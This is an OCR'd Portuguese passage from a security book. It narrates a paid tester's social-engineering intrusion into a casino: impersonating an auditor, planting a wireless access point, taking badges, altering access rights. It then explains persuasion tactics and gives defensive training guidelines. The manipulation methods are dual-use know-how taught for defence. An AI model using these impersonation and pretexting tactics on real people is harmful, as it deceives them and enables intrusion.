fosse um executivo junior. A maioria das pessoas que circulavam no local usava roupas assim, entao seria 
altamente improvavel que me perguntassem alguma coisa". 

Ao descer o corredor, ele notou que urna das cameras era parecida com aquelas que tinha visto no Travei 
Channel — urna sala "Eye in the sky", que, entretanto, nao era suspensa. O lado extemo da sala tinha "a 
maior quantidade de VCRs que ja vi em um lugar — cara, era dez!". Ele entrou em urna sala e fez algo 
especialmente corajoso. "Entrei, pigarreei e, antes de me fazerem qualquer pergunta, disse: 'Foco na garota 
do 23'." 

Os displays eram numerados e, evidentemente, em quase todos havia urna garota. Os homens reuniram-se 
em volta do display 23 e comeęaram a falar sobre o que a menina poderia fazer, o que, na opiniao de 
Whurley, gerou muita paranóia. Eles ficaram cerca de 15 minutos observando as pessoas pelos monitores, o 
que convenceu Whurley de que o emprego seria perfeito para qualquer um que tivesse tendencia ao 
voyeurismo. 

Enquanto ele se preparava para sair, disse: "Ah, fiquei tao envolvido nessa aęao que me esqueci de me 
apresentar. Sou o Walter, da Auditoria Interna. Acabei de ser contratado para a equipe de Dan Moore", 
concluiu, usando o nome do chefe da Auditoria Interna, que ele tinha ouvido em urna de suas conversas. "Eu 
nunca estive aqui antes, por isso estou meio perdido. Voces poderiam me dizer onde ficam os escritórios dos 
executivos?" 

Eles ficaram mais do que satisfeitos em se livrar de um executivo intrometido e ansiosos para ajudar 
'Walter' a encontrar os escritórios que estava procurando. Whurley seguiu a direęao indicada. Como nao viu 
ninguem, decidiu dar urna olhada nos arredores e encontrou urna pequena sala de descanso onde urna jovem 
estava lendo urna revista. "O nome dela era Megan; era urna garota bem legał. Nós conversamos alguns 
minutos. E ela disse: 'Ah, se voce e da Auditoria Interna, eu tenho algumas coisas que precisam voltar para 
la'." Megan deu a ele alguns crachas, memorandos intemos e urna caixa de papeis que pertenciam ao 
escritório principal da Auditoria Interna do grupo. Whurley pensou: "Oba, agora eu tenho um cracha!". 

Nao que aquelas pessoas olhassem atentamente para as fotos nos crachas de identificaęao, mas ele tomou 
a precauęao de vira-lo de modo que o verso ficasse visivel. 

Enąuanto eu estava saindo, vi um escritório aberto, vazio. Tinha duas portas de rede, mas nao 
consegui dizer se eram ativas só de olhar para elas. Entao voltei para onde Megan estava 
sentada e disse-lhe que havia me esąuecido de que deveria olhar o sistema dela e aquele no 
'escritório do chefe'. Ela concordou educadamente e me deixou sentar em sua mesa. 

Ela me deu sua senha e precisou usar o toalete. Entao, eu lhe disse que ia adicionar um 
'monitor de seguranęa de rede' e mostrei-lhe o ponto de acesso sem fio. Ela respondeu: "Tanto 
faz. Nao entendo muito dessa coisa de computador". 
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Enąuanto ela estava fora, Whurley instalou o ponto de acesso sem fio e reiniciou seu desktop. Entao 
percebeu que havia um flash drive universal serial bus (USB) 256 MB em seu chaveiro e total acesso ao 
computador de Megan. "Comecei navegando pelo disco rigido e encontrei todo tipo de coisa boa." Ela era 
administradora executiva e tinha organizado os arquivos de todos os executivos pelo nome, 'todos simpaticos 
e elegantes'. Ele pegou tudo o que pode; entao, usando o recurso timer em sua camera digital, tirou urna foto 
de si mesmo sentado no escritório do executivo-chefe. Depois de alguns minutos Megan voltou, e ele lhe 
pediu instruęoes para chegar ao Centro de Operaęoes da Rede, 

La ele passou por um 'problema serio'. Ele conta: "A sala da rede estava identificada... o que era . No 
legał en tan to, a porta estava trancada". Como nao tinha cracha que lhe desse acesso, tentou bater na porta. 

Um cayalheiro veio a porta e eu lhe contei a mesma historia que tinha contado antes: "Ola, sou 
Walter, da Auditoria Interna e bla-bla-bla". Só que eu nao sabia que o chefe dele — o diretor 
de TI — estava no escritório. Entao ele disse: "Bem, preciso verificar com Richard. Só um 
momento". 

Ele se vira e diz a outro sujeito para procurar Richard e informa-lo de que ha alguem 
'alegando' ser da Auditoria Interna. Momentos depois, fui pego. Richard perguntou quem eu 
era, onde estaya o meu cracha e fez mela duzia de outras perguntas urna atras da outra. Dai ele 
disse: "Por que voce nao vem ate meu escritório enquanto eu ligo para a Auditoria Interna e 
esclarecemos isso?". 

Whurley imaginou: "Esse cara me pegou de jeito". Mas entao "pensei rapido e disse: 'Voce me pegou!', e 
apertei a mao dele. Entao me apresentei: 'Meu nome e Whurley'. E procurei um cartao de visita em meu 
bolso. Ai lhe contei que estive dentro do cassino durante algumas horas e que nenhuma pessoa havia me 
perguntado nada- Ele era o primeiro a fazer isso e agora, provavelmente, gostaria de dar urna boa olhada em 
meu relatório. Alem disso, eu disse: 'Vamos ate o seu escritório para voce ler o relatório; entao sabera que 
tudo o que disse e yerdade'. 'Preciso falar tambem com a Martha, que e a encarregada dessa operaęao, sobre 
algumas coisas que vi por ai."' 

Para quem e pego de saia justa, essa parece ter sido urna saida brilhante. Houve urna transformaęao 
surpreendente: Richard comeęou a perguntar a Whurley o que ele tinha visto, nomes de pessoas e assim por 
diante. Entao explicou-lhe que tinha feito sua própria auditoria na tentativa de aumentar o oręamento de 
seguranęa para tomar o Centro de Operaęoes da Rede mais seguro, com "biometrica e tudo". Ele sugeriu que 
talvez pudesse usar algumas informaęóes de Whurley, pois elas o ajudariam a atingir seu objetivo. 

Aquela altura era hora do almoęo, Whurley aproveitou a brecha e sugeriu que eles conversassem durante 
o almoęo* Aparentemente, Richard achou urna boa ideia e eles foram juntos para o refeitório dos executivos. 
"Notę que ainda nao tinhamos chamado ninguem ate aquele ponto. Sugeri que fizessemos aquela ligaęao e 
ele disse: 'Voce tern um cartao, eu sei quem voce e'." Entao, os dois almoęaram juntos no refeitório- Whurley 
recebeu urna refeięao gratuita e fez um novo 'amigo'. 

"Ele perguntou sobre minha experiencia em redes e comeęamos a conversar sobre o AS400s que o 
cassino estaya usando para executar tudo. O fato de as coisas terem caminhado assim pode ser 
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descrito em duas palavras — muito assustador." Assustador porąue o homem era o diretor de TI e 
responsavel pela seguranęa de computador e estava dividindo com Whurley todo tipo de informaęao 
privilegiada, interna, sem antes ter tornado a medida mais elementar: verificar sua identidade. 

Comentando isso, Whurley observou que "os gerentes de nivel medio nem sempre ąuerem ser colocados 
em evidencia". Como a maioria de nós eles nunca ąuerem estar errados nem ser pegos cometendo um erro 
óbvio. Entender a mentalidade deles pode ser urna vantagem enorme". Depois do almoęo, Richard levou 
Whurley de volta ao Centro de Operaęoes da Rede. 

"Quando entramos, ele me apresentou a Larry, o principal administrador de sistemas do AS400s. file lhe 
explicou que eu iria 'ataca-los' em urna auditoria durante alguns dias, que tinha almoęado comigo e havia me 
convencido a fazer urna auditoria preliminar e a poupa-los de qualquer constrangimento maior" quando 
chegasse o momento da auditoria real. Em alguns minutos Whurley obteve urna visao geral dos sistemas de 
Larry e reuniu mais informaęoes uteis para seu relatório, como, por exemplo, o fato de que o Centro de 
Operaęoes da Rede tinha armazenado e processado os dados agregados para todo o grupo. 

Eu lhe disse que poderia ajuda-lo mais rapidamente se tivesse um diagrama da rede, Listas de 

Controle de Acesso ao firewall e assim por diante, que ele forneceu somente depois de pedir a 

aprovaęao de Richard. Pensei: "Bom para ele". 

Whurley de repente percebeu que tinha deixado o ponto de acesso sem fio nos escritórios dos 
executivos. Embora suas chances de ser pego tivessem diminuido radicalmente depois que fez amizade com 
Richard, ele explicou a Larry que precisava voltar para pegar o ponto de acesso que tinha esąuecido. "Para 
fazer isso eu preciso de um cracha para poder voltar ao Centro de Operaęoes da Rede e ir e vir quando 
ąuiser." Larry pareceu um pouco relutante em fazer isso, entao Whurley recomendou que ele ligasse para 
Richard outra vez. Ele ligou e disse a Richard que o visitante ąueria um cracha. Richard teve urna ideia ainda 
melhor: O cassino tinha demitido varios funcionarios recentemente, e os crachas deles estavam no Centro de 
Operaęoes da Rede. Como ninguem ainda tinha encontrado tempo para desativa-los, "ele poderia usar um 
deles". 

Larry voltou a lhe dar explicaęoes sobre os sistemas e a descrever as medidas de seguranęa que eles 
tinham adotado recentemente. Entao, recebeu um telefonema de sua esposa, que parecia estar irritada e 
zangada com alguma coisa. Whurley aproveitou a situaęao, reconheceu que podia se beneficiar dela. Larry 
disse a esposa: "Escute, nao posso conversar agora. Estou com urna pessoa aqui no escritório". Whurley fez 
sinal a Larry para pedir que sua esposa aguardasse um instante e entao lhe disse que era importante que 
conseguisse resolver o problema com ela. Entao, ofereceu-se para pegar um dos crachas, se Larry lhe 
mostrasse onde eles estavam. 

"Entao, Larry me levou ate um armario de arquivos, abriu urna gaveta e disse 'Pegue um destes'. Ele 
voltou para sua mesa e pegou o telefone. Notei que nao havia urna folha para registrar a saida dos crachas, 
entao peguei dois dos varios que estavam la," Agora ele tinha nao apenas um cracha, mas um que lhe 
permitiria acesso ao Centro de Operaęoes da Rede a qualquer hora. 

Whurley voltou para encontrar sua nova amiga, Megan, recuperar seu ponto de acesso sem fio e ver o que 
mais poderia descobrir, E ele poderia aproveitar seu tempo. 
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Imaginei que a hora nao iria importar, porąue ele estaya ao telefone com a esposa e ficaria 
distraido por mais tempo do que imaginaya. Ativei o cronómetro em meu telefone para contar 
vinte minutos, tempo suficiente para eu fazer exploraęoes sem levantar as suspeitas de 
Larry,que parecia desconfiar de alguma coisa. 

Qualquer um que tenha trabalhado em um departamento de TI sabe que os crachas de identificaęao estao 
yinculados a um sistema de computador; acessando o PC certo, voce pode expandir esse acesso a qualquer 
lugar no edificio. Whurley esperava descobrir o computador onde os priyilegios de acesso do cracha eram 
controlados para poder modifica-los nos dois crachas que tinha conseguido. Atravessou os corredores 
olhando os escritórios para tentar encontrar o sistema de controle dos crachas, o que foi bem mais dificil do 
que imaginaya. Ele sentiu-se ffustrado e sem saida. 

Entao decidiu perguntar a alguem. Escolheu o guarda que havia sido amigavel com ele na entrada dos 
funcionarios. Aquela altura muita gente o tinha visto com Richard, tanto que as suspeitas eram praticamente 
inexistentes. Whurley achou o seu alvo e lhe disse que precisava ver o sistema de controle de acesso ao 
edificio. O guarda nem perguntou por que. Sem problema. Ele foi informado exatamente onde encontrar o 
que estava procurando. 

"Encontrei o sistema de controle e entrei na pequena sala de rede onde ele estava localizado. La havia um 
PC no chao com urna lista de crachas de identificaęao ja abertos. Nenhum protetor de tela, nenhuma senha 
— nada para me atrasar." Na opiniao dele, isso era comum. "As pessoas tern urna mentalidade de 'ninguem 
pensa no que nao ve'. Se um sistema como esse esta numa area de acesso controlada, eles acham que nao ha 
necessidade de ser zeloso e proteger o computador." 

Alem de ter acesso a todas as areas, havia mais urna coisa que ele queria fazer: 

Só por diversao, eu pensei que deveria pegar o cracha extra, acrescentar alguns priyilegios de 
acesso, substituir o nome e entao troca-lo com um funcionario que ficasse andando pelo cassino, 
ajudando-me inadvertidamente a confundir os logs de auditoria. Mas quem eu escolheria? 
Megan, e claro — seria facil trocar os crachas com ela. Tudo o que eu teria de fazer seria dizer 
que precisaya da aj uda dela na auditoria. 

Quando Whurley entrou, Megan foi tao amigavel quanto antes. Ele explicou que tinha completado o teste 
e precisaya pegar o equipamento. Entao disse que precisaya de sua ajuda. "A maioria dos engenheiros sociais 
concordaria com o fato de que as pessoas mostram grandę disposięao em ajudar." Ele precisaya ver o cracha 
de Megan para verifica-lo na lista que tinha. Assim, Megan teria um cracha que confundiria ainda mais as 
coisas, enquanto Whurley teria o cracha dela e o cracha que o identificaria como um executivo nos logs. 

Quando Whurley voltou ao escritório de Larry, o gerente, extremamente aborrecido, estava acabando de 
falar com sua esposa. Quando fmalmente pós o telefone no gancho, estava disposto a continuar a conversa. 
Whurley pediu-lhe que explicasse os diagramas de rede em detalhes, mas interrompeu a conversa e, para 
desarma-lo, perguntou como estavam as coisas com a esposa. Os dois passaram quase urna hora conversando 
sobre casamento e outros assuntos da vida. 
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No finał de nossa conversa, eu estava convencido de que Larry nao me causaria mais 
problemas. Entao, expliquei a ele que meu laptop tinha um software especial de auditoria e que 
eu precisaria executa-lo contra a rede. Como em geral tenho um equipamento de ponta, figar o 
laptop a rede e sempre facil, porque nao ha um fanatico por computador no planeta que nao 
queira ve-lo funcionando. 

Depois de um tempo, Larry foi fazer algumas ligaęoes e resolver outras ąuestoes. Sozinho na sala, 
Whurley escaneou a rede e conseguiu comprometer varios sistemas, tanto Windows ąuanto Linux, por causa 
do mau gerenciamento das senhas. Passou ąuase duas horas copiando informaęoes da rede e ate gravando 
alguns dos itens no DVD, "o que nunca foi ąuestionado". 

Depois de fazer tudo isso, pensei que seria engraęado e util experimentar mais uma coisa. 
Procurei todas as pessoas com quem eu tinha entrado em contato — algumas que tinham me 
visto de relance — e lhes disse algo como "Bem, ja terminei. Voce poderia me fazer um favor? 
Gosto de colecionar fotos de todas as pessoas e lugares onde trabalho. Voce se importaria em 
tirar uma foto comigo?". Isso foi surpreendentemente simples. 

Varias pessoas ate se ofereceram para tirar fotos dele com outras em escritórios próximos. Ele tinha 
crachas seguros, diagramas de rede e acesso a rede do cassino. E fotos para provar tudo. 

Na reuniao de avaliaęao, o chefe da Auditoria Interna reclamou que Whurley nao tinha o direito de tentar 
obter acesso aos sistemas de uma forma fisica, porque "eles nao seriam atacados daquela maneira". Tambem 
disseram a Whurley que o que havia feito era quase um ato "criminoso" e que o cliente nao tinha gostado nem 
um pouco de suas atitudes. 

Whurley explicou: 

Por que o cassino achava que o que eu fiz nao era Justo? A resposta era simples. Eu nunca 
havia trabalhado com um cassino antes e nao entendia plenamente as regras [sob as quais eles 
trabalham]. Meu relatório poderia leva-los a uma auditoria pela Gaming Commission, o que 
poderia ter repercussoes financeiras reais. 

Whurley foi pago por seus servięos, por isso nao se importou muito com a critica. Embora quisesse ter 
causado uma impressao melhor no cliente, sentiu que ele havia odiado a abordagem que tinha usado e achado 
tudo muito injusto consigo e com seus funcionarios. "O cliente deixou bem claro que nunca mais queria me 
ver." 

Aquilo nunca acontecera com ele antes. Geralmente seus clientes apreciavam os resultados de suas 
auditorias e as viam como o que ele chamava de "eventos de equipe mini-red ou jogos de guerra", isto e, nao 
se importavam em serem testados com metodos semelhantes aos de um hacker hostii ou um engenheiro social 
"Os clientes costumam ficar empolgados com isso. Eu tambem ficava, ate hoje." 
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No finał das contas, Whurley classifica a experiencia de Las Vegas como um sucesso na area de testes, mas um 
desastre na area de relaęoes com clientes. "Provavelmente nunca mais voltarei a trabalharem Vegas". ele lamenta. 

Talvez a Gaming Commission precise dos servięos de consultoria de um hacker etico que ja conheęa a back door 
de um cassino. 

Insight 

O psicólogo social Brad Sagarin, PhD, que desenvolveu um estudo sobre persuasao, descreve o arsenał do 
engenheiro sociał do seguinte modo: "Nao ha nada magico na engenharia social. O engenheiro social emprega as 
mesmas tecnicas persuasivas que usamos no dia-a-dia. Assumimos papeis. Tentamos obter credibilidade. Cobramos 
obrigaęoes reciprocas. Mas, ao contrario da maioria de nos, o engenheiro social aplica essas tecnicas de maneira 
manipuladora, enganosa, altamente antietica e em geral com efeito devastador". 

Pedimos ao Dr. Sagarin que descrevesse os principios psicológicos subjacentes a maioria das taticas comuns 
usadas por engenheiros sociais. Em varios casos, ele acrescentou a explicaęao um exemplo que ilustrava a tatica 
mencionada, extraido do nosso livro anterior, A arte de enganar. 

Cada item comeęa com urna explicaęao informal e nao-cientifica do principio, seguida de um exemplo. 

Representando um papel 

O engenheiro social exibe algumas caracteristicas comportamentais do papel que esta usando para se mascarar. A 
maioria de nos tende a preencher as lacunas com algumas caracteristicas de um papel social — quando vemos um 
homem vestido como um executivo, supomos que ele seja inteligente, centrado e confiavel. 

Exemplo: Quando Whurley entrou na sala Eye in the sky, estava yestido como um executivo, falou com 

autoridade e deu o que os homens na sala interpretaram como uma ordem, Ele usou com sucesso o 

perlił de um gerente ou executivo de um cassino. 

Na maioria dos ataques de engenharia social, o atacante assume certos acessórios do 'papel' que esta 
representando para fazer com que o alvo infira outras caracteristicas e aja de acordo com o esperado. Esse papel pode 
ser o de um tecnico de TI, o de cliente, o de um novo contratado ou de qualquer um que requeira o cumprimento de 
uma solicitaęao. Taticas comumente usadas sao mencionar o nome do chefe do alvo ou de outros funcionarios, usar 
terminologia ou jargao da empresa ou do setor. Para ataques 'fisicos', os atacantes podem escolher roupas, jóias (um 
alfinete da empresa, um relógio de atleta, uma caneta cara, um anel de formatura) ou modos de se arrumar (por 
exemplo, o estilo do penteado), tambem acessórios que podem conferir credibilidade ao papel desempenhado pelo 
atacante. A foręa desse metodo deve-se ao fato de que, ao aceitarmos alguem (como um executivo, cliente ou 
funcionario), fazemos inferencias e atribuimos outras caracteristicas a essa pessoa (um executivo e rico e poderoso; 
um desenvolvedor de 
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software tern conhecimentos tecnicos, mas pode ser socialmente inibido; um funcionario e digno de confianęa). 

Quanta informaęao e necessaria antes que as pessoas comecem a fazer tais inferencias? Nao muita. 

Credibilidade 

Obter credibilidade e a primeira etapa da maioria dos ataąues de engenharia social, um ponto fimdamental para 
tudo o que vem depois. 

Exemplo: Whurley sugeriu a Richard, executivo de TI, que almoęassem juntos, pois percebeu que o fato de ser 
visto com Richard transmitiria credibilidade a qualquer funcionario que os visse juntos. 

Dr. Sagarin identificou tres metodos, abordados em A arte de enganar, em que os engenheiros sociais confiam 
para construir a credibilidade. Em um deles, o atacante diz algo que parece ir contra seus interesses, como mostrado 
no Capitulo 8 de A arte de enganar, na historia "Urna ligaęao simples", quando o atacante diz a sua vitima: "Agora 
insira a sua senha, mas lembre-se de nao dize-la em voz alta". Essa parece ser urna declaraęao de alguem que e digno 
de confianęa. 

No segundo metodo, o atacante adverte o alvo de um evento que ele mesmo provocara (sem que o alvo saiba). 
Por exemplo, na historia "A queda da rede", que aparece no Capitulo 5, o atacante explica que a conexao da vitima 
com a rede pode cair. Entao faz com que isso de fato aconteęa, obtendo credibilidade junto a ela. 

Em geral, essa tatica de predięao e combinada com o terceiro metodo, em que o atacante 'prova' ser confiavel 
ajudando a vitima a resolver o problema. E o que acontece em "A queda da rede", quando o atacante primeiro avisa a 
vitima de que ela pode perder a conexao com a rede, entao faz com que a conexao caia, como previsto, e 
subsequentemente a restaura e alega que havia "corrigido o problema", conquistando a confianęa e ganhando a 
gratidao de sua vitima. 

Foręando o alvo a desempenhar um papel 

O engenheiro social induz seu alvo a assumir um papel altemativo, foręando, por exemplo, sua submissao ao agir 
com agressividade. 

Exemplo: Whurley, em suas conversas com Lenore, colocou-se em um papel de alguem carente (acabou 

de romper o namoro, mudou-se para a cidade e precisa de emprego), a flm de induzi-la e faze-la 

assumir um papel de alguem que aj uda. 

Em geral, o engenheiro social tern como alvo o papel do ajudante. Depois que urna pessoa aceita esse papel acha 
esquisito ou dificil negar ajuda. 

Um engenheiro social astuto tenta encontrar um papel em que a vitima se sinta mais a vontade. Entao manipula a 
conversa para fazer com que a pessoa o assuma — como Whurley fez com Lenore e com Megan ao perceber que elas 
se sentiriam bem em ajudar. As pessoas tendem a aceitar papeis positivos e que as faęam sentir-se bem. 

Desviando-se do pensamento sistematico 

Os psicólogos sociais descobriram que os seres humanos processam as informaęoes que recebem de um entre 
dois modos, que definiram como sistematico e heuristico. 
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Exempło: ąuando um gerente precisou lidar com uma situaęao dificil que envolvia sua esposa, que estava 
extremamente aborrecida. Whurley aproveitou-se do estado emocional do homem e de sua distraęao para fazer-lhe 
uma solicitaęao que Ihe rendeu um cracha de funcionario. 

O Dr. Sagarin explica: "Ao processar sistematicamente, pensamos cuidadosa e racionalmente sobre uma 
solicitaęao antes de tomar uma decisao. Ao processar heuristicamente, fazemos atalhos para tomar decisoes. Por 
exemplo, poderiamos atender a uma solicitaęao com base em quem o solicitante alega ser, e nao na confidencialidade 
da informaęao que solicitou. Tentamos operar no modo sistematico quando o assunto e importante para nós. Mas a 
pressao do tempo, a distraęao ou uma forte emoęao podem nos fazer adotar o modo heuristico". 

Gostamos de pensar que normalmente operamos de maneira racional e lógica, tomando decisoes com base nos 
fatos. Sobre isso, o psicólogo Gregory Neidert afirmou: "Nós, humanos, deixamos de usar nosso cerebro em 90 a 95 
por cento das vezes".' Os engenheiros sociais tentam tirar vantagem disso, usando varios metodos para foręar suas 
vitimas a sair do modo sistematico — sabem que as pessoas que operam heuristicamente tern muito menos 
probabilidade de utilizar suas defesas psicológicas, de levantar suspeitas, fazer perguntas ou apresentar objeęoes ao 
atacante. 

Os engenheiros sociais procuram abordar alvos que operem no modo heuristico e mante-los nesse modo. Uma 
tatica e ligar para um alvo cinco minutos antes do firn do expediente, contando com o fato de que a ansiedade em sair 
do escritório na hora certa possa leva-lo a atender a uma solicitaęao que, em outra situaęao, poderia questionar. 

Momento de condescendencia 

Os engenheiros sociais provocam um momento de condescendencia ao fazer uma serie de solicitaęoes, a comeęar 
pelas inofensivas. 

Exempło: O Dr. Sagarin cita a historia da 'CreditChex', que aparece no Capitulo 2 de A arte de enganar, em que 
o atacante insere a questao-chave, uma informaęao confidencial sobre o numero de ID do comerciante, que era usado 
como senha para verificaęao da identidade pelo telefone, entre outras perguntas inofensivas. Como as perguntas 
iniciais parecem inofensivas, isso estabelece uma situaęao em que a vitima e levada a considerar igualmente 
inofensivas as informaęoes mais confidenciais. 

O redator/produtor de televisao Richard Levinson fez desta tatica uma das maiores caracteristicas de seu 
personagem mais famoso, Columbo, interpretado pelo ator Peter Falk. O publico se deliciava em saber que, quando o 
detetive estava indo embora e o suspeito estava baixando a guarda, satisfeito por te-lo enganado, Columbo parava para 
fazer uma ultima pergunta, a pergunta-chave que tinha formulado o tempo todo. Os engenheiros sociais 
frequentemente fazem uso da tatica 'só mais uma coisa’. 

O desejo de ajudar 

Os psicólogos identificaram muitos beneficios que as pessoas recebem quando ajudam os outros. Ajudar pode nos 
fazer sentir fortalecidos, Pode nos livrar do mau humor. Pode nos fazer sentir bem com relaęao ao nosso 
comportamento. Os engenheiros sociais descobrem muitas maneiras de tirar vantagem de nossa inclinaęao para 
ajudar. 

Exemplo: quando Whurley apareceu na entrada dos funcionarios do cassino, o guarda acreditou em sua historia 
sobre levar uma 'garota' para almoęar, emprestou-lhe dinheiro para o encontro, 
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deu-lhe conselhos sobre como lidar com urna mulher e nao insistiu ąuando Whurley saiu sem lhe mostrar o 
cracha de identificaęao. 

O Dr. Sagarin comenta: "Como em geral os engenheiros sociais tern como alvo pessoas que nao sabem o 
valor das informaęoes que estao passando, a ajuda pode ser vista como pouco custosa aquele que ajuda. (Qual 
o problema de fazer urna consulta rapida em um banco de dados para o pobre palerma do outro lado da 
linha?)". 

Atribuięao 

A atribuięao refere-se a maneira como as pessoas explicam seu próprio comportamento e o dos outros. 
Um dos objetivos do engenheiro social e levar o alvo a atribuir-lhe certas caracteristicas, como a experiencia, 
e fazer-se merecedor de confianęa, credibilidade ou simpatia. 

Exemplo: O Dr. Sagarin cita a historia "O caęa-promoęoes", Que aparece no Capitulo 10 de A 
arte de enganar. O atacante perambula um pouco antes de solicitar acesso a uma sala de 
reunioes, atenuando a suspeita sobre si, porque as pessoas supoem que um intruso nao ousaria 
se demorar num lugar onde poder!, ser pego. 

Um engenheiro social poderia ir ate uma recepęao, colocar uma nota de cinco dólares no balcao dizer a 
e recepcionista algo como: "Encontrei isso no chao. Alguem declarou ter perdido dinheiro?". Com isso, ela 
atribuiria ao engenheiro social as qualidades de honestidade e confianęa. 

Se virmos um homem segurar a porta para uma senhora passar, acharemos que ele esta sendo educado; se 
a mulher for jovem e atraente, provavelmente atribuiremos isso a um motivo bem diferente. 

Gostar 

Os engenheiros sociais ffeqiientemente tiram vantagem do fato de que todos nos temos a inclinaęao de 
dizer 'sim' as solicitaęoes das pessoas de quem gostamos. 

Exemplo: Whurley conseguiu obter informaędes uteis de Lenore, a garota que conheceu na academia, em 
parte usando a "leitura de sinais nao-verbais' para avaliar suas reaęoes e para adaptar continuamente seus 
comentarios as suas respostas. Isso a levou a acreditar que eles partilhavam gostos e interesses semelhantes 
("Eu tambem!"). A simpatia por ele tomou-a mais acessivel, de modo a lhe dar as informaędes que ele queria. 

As pessoas gostam de outras que se parecem consigo, que tern interesses semelhantes aos seus no que diz 
respeito a carreira, a formaęao escolar e aos hobbies. Em geral, o engenheiro social pesquisa a formaęao de 
seu alvo para simular um interesse por coisas que ele considera importantes — velejar ou jogar tenis, avioes 
antigos, colecionar armas antigas, entre outros interesses. Os engenheiros sociais podem ser benquistos por 
fazer elogios e adulaędes; aqueles que sao fisicamente atraentes podem usar esse atributo para serem mais 
queridos. 

Outra tatica e citar o nome de pessoas que o alvo conhece e das quais gosta. Nesse caso, o ata-cante tenta 
ser visto como parte do 'grupo' da organizaęao. Os hackers tambem usam elogios ou adulaęoes para 
massagear o ego da vitima ou de pessoas-alvo que recentemente foram recompensadas por alguma realizaęao 
na organizaęao. Massagear o ego pode induzir uma yitima ingenua a assumir o papel de ajudante. 



A arte de irwadir 


Medo 

Um engenheiro social pode tentar fazer seu alvo acreditar que algo terrivel esta para acontecer, mas que o 
desastre iminente pode ser evitado se o alvo fizer o que o atacante sugere. Desse modo. o atacante usa o medo como 
arma. 

Exemplo; Na historia "Opatch de emergencia", que aparece no Capitulo 12 de A arte de enganar, o engenheiro 
social assusta sua vitima com a ameaęa de que elaperdera dados valiosos, a nao ser que concorde em ter um 'patch' 
de emergencia instalado no servidor do banco de dados da empresa. O medo torna a vitima vulneravel a 'soluęao' 
proposta pelo engenheiro social 

Os ataques baseados em status frequentemente contam com o elemento medo. Um engenheiro social que se faz 
passar por executivo da empresa, por exemplo, pode ter como alvo urna secretaria ou um fimcionario menos 
graduado e fazer-lhe urna exigencia 'urgente', deixando implicito que o subordinado tera problemas ou podera ser 
demitido se nao a cumprir. 

Reactancia 

A reactancia psicológica e a reaęao negativa que temos quando percebemos que nossas escolhas ou liberdade 
estao sendo tolhidas. Quando passamos por esse processo, perdemos a noęao de perspectiva a medida que nosso 
desejo pela coisa que perdemos ofusca tudo o mais. 

Exemplo: Duas histórias em A arte de enganar ilustram o poder da reactancia — urna baseada nas ameaęas a 
respeito da perda de acesso a informaęoes, outra sobre a perda de acesso a recursos de computaęao. 

Em um ataque tipico baseado na reactancia, o atacante diz ao alvo que ele nao podera acessar seus arquivos 
durante certo tempo e estabelece um periodo totalmente inaceitavel. "Voce nao vai conseguir acessar seus arquivos 
nas próximas duas semanas, mas faremos o possivel para garantir que nao demore mais que isso," Quando a vitima 
comeęa a reagir, o atacante se oferece para ajudar a restaurar os arquivos mais rapidamente; para tanto, ele só 
precisaria do nome do usuario e da senha do alvo, O alvo, aliviado por poder evitar a inacessibilidade, geralmente 
concorda. 

O outro lado da moeda implica usar o principio da escassez para coibir o alvo a perseguir um ganho prometido. 
As vitimas podem ser arrastadas, por exemplo, para um site Web em que suas in-formaęoes ou os dados de seu cartao 
de credito podem ser furtados. Como voce reagiria a um e-mail que promete um Apple iPod novinho por 200 dólares 
para os mil primeiros visitantes que acessarem determinado site Web? Voce visitaria o site e se registraria para 
comprar um? E, ao registrar seu endereęo de e-mail e escolher urna senha, voce usara a mesma senha que usa em 
outras transaęoes? 

Medidas preventivas 

Atenuar os ataques de engenharia social requer urna serie de esforęos coordenados, tais como: 

• Desenvolver protocolos claros e concisos que sejam cumpridos consistentemente em toda a organizaęao; 

• Organizar um treinamento em consciencia da seguranęa; 

• Criar regras simples que definam quais sao as informaęoes confidenciais; 

• Elaborar urna regra simples segundo a qual sempre que alguem solicitar urna aęao restrita (ou seja, urna 
aęao que envolva a interaęao com um equipamento relacionado a um 
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computador, cujas conseąuencias nao sejam conhecidas), a identidade do solicitante seja verificada de 
acordo com a politica da empresa; 

• Desenvolver urna polltica de classificaęao de dados; 

Treinar funcionarios para resistir a ataąues de engenharia social; 

• Testar a suscetibilidade de seu funcionario a ataąues de engenharia social, conduzindo urna 
avaliaęao de seguranęa. 

O aspecto mais importante do programa e estabelecer protocolos de seguranęa adeąuados e, entao, motivar os 
funcionarios para que assimilem esses protocolos. A próxima seęao delineia alguns pontos basicos que devem ser 
considerados ąuando se elaboram programas e treinamento para combater a ameaęa da engenharia social. 

Diretrizes para treinamento 

A seguir sao apresentadas algumas orientaęoes para treinamento: 

• Fique ciente de que certamente os engenheiros sociais vao atacar sua empresa em algum momento, 
talvez repetidamente. 

Pode haver urna falta de consciencia generalizada de que os engenheiros sociais constituem urna ameaęa 
substancial. Muitas pessoas nem seąuer tern consciencia de que essa ameaęa existe. Geralmente elas nao 
esperam ser manipuladas e enganadas, e sao pegas desprevenidas por um ataque de engenharia social. 
Muitos usuarios da Internet tern recebido um e-mail supostamente enviado da Nigeria solicitando ajuda para 
fazer a transferencia de urna soma substancial de dinheiro para os Estados Unidos. No e-mail e oferecida 
urna porcentagem da soma bruta em troca de assistencia. Mais tarde, solicita-se que a vitima adiante urna 
ąuantia referente a algumas taxas para iniciar o processo de transferencia, e ela fica de bolso vazio. Urna 
senhora em Nova York caiu no conto-do-vigario recentemente e pediu emprestado a seu empregador 
centenas de milhares de dólares para pagar essas taxas. Em vez de passar seu tempo de lazer em seu iate 
novo, que pretendia comprar, ela esta tendo de considerar a perspectiva de dividir urna vaga na penitenciaria 
federal. As pessoas realmente caem nesses ataąues de engenharia social; caso contrario, os vigaristas 
nigerianos parariam de enviar e-mails. 

• Elsę o desempenho de papel para demonstrar a vulnerabilidade pessoal a tecnicas de engenharia 
social e para treinar funcionarios em metodos de resistencia. 

A maioria das pessoas opera sob a ilusao de nwulnerabilidade, considerando-se espertas demais para serem 
manipuladas, persuadidas, enganadas ou influenciadas. Elas acreditam que essas coisas só acontecem a 
pessoas 'tolas'. Existem dois metodos para ajudar os funcionarios a entender sua vulnerabilidade e toma-los 
verdadeiramente cientes dela. Um deles e demonstrar a efetividade da engenharia social 'colocando alguns 
funcionarios no fogo' antes de participarem de um seminario de consciencia de seguranęa e fazendo-os 
relatar suas experiencias durante o evento. Outra abordagem sugere a analise de casos de engenharia social 
para ilustrar como as pessoas sao suscetiveis a esses ataąues. Em ąualąuer um dos casos, o treinamento deve 
examinar o mecanismo dos ataąues, analisando por que funcionou e discutindo como podem ser 
